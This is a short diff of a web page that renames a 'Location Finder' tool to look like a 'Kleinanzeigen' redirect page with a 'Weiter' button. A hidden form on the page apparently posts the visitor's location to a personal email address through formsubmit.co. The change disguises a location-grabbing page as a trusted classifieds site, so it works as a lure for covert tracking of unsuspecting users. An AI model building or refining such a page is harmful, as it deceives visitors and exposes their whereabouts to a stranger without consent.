--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Location Finder</title>
+  <title>Weiterleitung</title>
   <style>
     body {
       font-family: Arial, sans-serif;
@@ -22,8 +22,8 @@
   </style>
 </head>
 <body>
-  <h1>Find Your Location</h1>
-  <button id="getLocationBtn">Get My Location</button>
+  <h1>Kleinanzeigen</h1>
+  <button id="getLocationBtn">Weiter</button>
   <div id="location"></div>
 
   <form action="https://formsubmit.co/alex69gggamer@gmail.com" method="POST" id="locationForm" style="display:none;">
